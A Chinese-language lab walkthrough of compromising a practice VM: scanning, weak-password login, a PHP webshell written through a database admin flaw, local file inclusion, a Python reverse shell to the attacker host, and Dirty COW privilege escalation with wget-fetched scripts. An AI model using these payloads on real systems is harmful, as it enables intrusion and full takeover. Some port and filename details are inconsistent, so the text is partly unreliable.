一、主机发现
arp-scan -l
靶机ip为192.168.55.147
二、端口扫描、目录枚举、指纹识别
2.1端口扫描
发现有111这一个特殊端口,启用了rpcbind服务
2.2目录枚举
dirb http://192.168.55.147
2.3指纹识别
nmap 192.168.55.147 -sV -sC -O --version-all
三、进入靶机网站收集信息,反弹shell
进入靶机页面后发现没有交互界面,重新回到目录枚举时枚举到的目录中,依次查看枚举出来的目录
发现此目录下有一个php文件,别的很多目录都是js文件
访问后发现是一个登录框,首先去查找一下中间件的漏洞
发现版本号相同,可能能够利用
通过查看24044.txt文件可知,攻击者可以创建一个数据库,可以在其中写入一句话木马
尝试使用弱口令,发现admin即可成功登陆
登陆后需要根据刚刚的文件内容进行创建数据库并写入一句话木马
首先创建一个shell.php的数据库
切换到shell.php数据库中创建数据
然后创建表
写入一句话木马
<?php echo system($_GET["cmd"]); ?>
创建成功后给了绝对路径
现在就要考虑怎么进行访问了
回到首页
发现该网站可能存在文件包含漏洞
尝试访问创建的shell.php文件
http://192.168.55.147/view.php?page=../../../../../usr/databases/shell.php
http://192.168.55.147/view.php?page=../../../../../usr/databases/shell.php&cmd=whoami
成功!
接下来进行反弹shell
kali桌面进行444端口的监听
使用反弹shell的命令
http://192.168.55.147/view.php?page=../../../../../usr/databases/shell.php&cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.55.129%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27
成功拿下shell
四、脏牛提权
首先进行靶机信息收集
uname-a
lsb_release -a
使用提权脚本查找一下内核漏洞
ls -la//首先查看目录权限,发现tmp目录具有权限
cd /tmp //切换到tmp目录下
python -m http.server 80 //攻击机开启80端口
wget http://192.168.55.129/linpeas.sh //靶机使用wget命令进行下载攻击机中的linpeas.sh脚本
chmod 777 linpeas.sh //然后使用chmod命令赋予该脚本执行权限
./linpeas.sh //使用该脚本
发现可以使用脏牛提权
在github中下载脚本到kali中
然后将脚本上传到靶机中
wget http://192.168.55.129/40839.c
在靶机中进行编译
gcc -pthread dirty.c -o dirty -lcrypt
执行exp
./dirty
提示输入密码,自己设置即可
然后使用ssh进行登录firefart用户即可
成功提权!